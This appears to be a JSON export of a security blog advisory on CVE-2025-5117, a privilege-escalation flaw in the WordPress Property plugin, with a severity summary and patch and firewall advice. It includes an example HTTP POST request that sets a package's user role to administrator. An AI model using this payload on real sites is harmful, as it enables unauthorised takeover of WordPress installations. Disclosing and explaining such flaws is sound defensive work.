{"id":47783,"date":"2025-06-02T09:52:16","date_gmt":"2025-06-02T09:52:16","guid":{"rendered":""},"modified":"2025-10-07T14:30:13","modified_gmt":"2025-10-07T20:30:13","slug":"cve-2025-5117-wordpress-property-plugin-privilege-escalation-vulnerability","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-5117-wordpress-property-plugin-privilege-escalation-vulnerability\/","title":{"rendered":"<strong>CVE-2025-5117: WordPress Property Plugin Privilege Escalation Vulnerability<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The CVE-2025-5117 vulnerability exposes a fundamental flaw in the security mechanism of WordPress&#8217;s Property plugin. It specifically targets versions 1.0.5 to 1.0.6 of the plugin, enabling malicious actors with Author-level access to escalate their privileges to those of an administrator. This vulnerability has the potential to be exploited by attackers to gain unauthorized access to sensitive data or to compromise the system, making it a significant threat to the security of WordPress <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-25010-critical-vulnerability-in-ericsson-ran-compute-and-site-controller-6610\/\"  data-wpil-monitor-id=\"53667\">sites that use the vulnerable<\/a> versions of the Property plugin.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-5117<br \/>\nSeverity: High &#8211; 8.8 (CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: Low (Author-level access)<br \/>\nUser Interaction: Required<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-0562-use-after-free-flaw-in-linux-kernel-potentially-leading-to-system-compromise\/\"  data-wpil-monitor-id=\"53682\">Potential system<\/a> compromise or data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-2305185147\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 720px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 22px; font-weight: 600; display: flex; align-items: center; letter-spacing: -0.02em;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 10px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 42px; height: 42px;\" \/>\r\n    <\/a>\r\n    Share secrets securely\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 14px; color: #d1d5db;\">\r\n    Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 18px; color: #a1a1aa;\">\r\n    Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 24px; color: #e4e4e7;\">\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Encrypted identity<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Private Spaces for organizations and teams<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 End-to-end encrypted chat, calls, files, and notes<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Sensitive AI work and protected collaboration<\/li>\r\n    <li>\u2022 Built for information that cannot leak<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px; color: #ffffff;\">\r\n    Our mission is to secure human work alongside AI.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Download Ameeba\r\n    <\/a>\r\n\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Learn More\r\n    <\/a>\r\n  <\/div>\r\n<\/div><\/div>\n<p>Product | Affected Versions<\/p>\n<p><a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31914-critical-sql-injection-vulnerability-in-pixel-wordpress-form-builder-plugin-autoresponder\/\"  data-wpil-monitor-id=\"54801\">WordPress Property Plugin<\/a> | 1.0.5 to 1.0.6<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25737-critical-vulnerability-in-kapsch-trafficcom-rsus-due-to-lack-of-secure-password-requirements\/\"  data-wpil-monitor-id=\"89247\">vulnerability resides in the lack<\/a> of a capability check on the use of the property_package_user_role metadata. This oversight allows authenticated attackers with Author-level <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-4433-improper-access-control-leads-to-privilege-escalation-in-devolutions-server\/\"  data-wpil-monitor-id=\"57335\">access to elevate their privileges<\/a> to that of an administrator by creating a package post and setting the property_package_user_role to administrator. After doing this, they simply have to submit the PayPal registration form to finalize the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31918-critical-privilege-escalation-vulnerability-in-simple-business-directory-pro\/\"  data-wpil-monitor-id=\"53725\">privilege escalation<\/a>.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-3924707725\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here&#8217;s a conceptual example of how the vulnerability might be exploited:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/wp-admin\/post-new.php?post_type=property_package HTTP\/1.1\nHost: vulnerable-wp-site.com\nContent-Type: application\/x-www-form-urlencoded\nCookie: wordpress_logged_in=[user_session_cookie]\npost_title=MaliciousPackage&amp;property_package_user_role=administrator&amp;_wpnonce=[valid_wpnonce]<\/code><\/pre>\n<p>This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-6162-critical-buffer-overflow-vulnerability-in-totolink-ex1200t-http-post-request-handler\/\"  data-wpil-monitor-id=\"79996\">HTTP request creates a new package post<\/a> with the user role set to &#8220;administrator. The attacker would then submit the PayPal registration form to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-39489-critical-privilege-escalation-vulnerability-in-pebas-couponxl\/\"  data-wpil-monitor-id=\"54061\">escalate their privileges<\/a> to an administrator level.<\/p>\n<p><strong>Mitigation Guidance<\/strong><\/p>\n<p>To mitigate the effects of this vulnerability, users are advised to apply the vendor patch for the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3054-arbitrary-file-upload-vulnerability-in-wp-user-frontend-pro-plugin-for-wordpress\/\"  data-wpil-monitor-id=\"59233\">WordPress Property<\/a> plugin as soon as possible. In the meantime, the use of a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary protection against <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-7457-macos-authorization-model-exploit-leading-to-potential-mitm-attacks\/\"  data-wpil-monitor-id=\"79995\">potential exploits<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The CVE-2025-5117 vulnerability exposes a fundamental flaw in the security mechanism of WordPress&#8217;s Property plugin. It specifically targets versions 1.0.5 to 1.0.6 of the plugin, enabling malicious actors with Author-level access to escalate their privileges to those of an administrator. This vulnerability has the potential to be exploited by attackers to gain unauthorized access [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[76],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-47783","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-privilege-escalation"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/47783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=47783"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/47783\/revisions"}],"predecessor-version":[{"id":82083,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/47783\/revisions\/82083"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=47783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=47783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=47783"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=47783"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=47783"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=47783"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=47783"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=47783"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=47783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}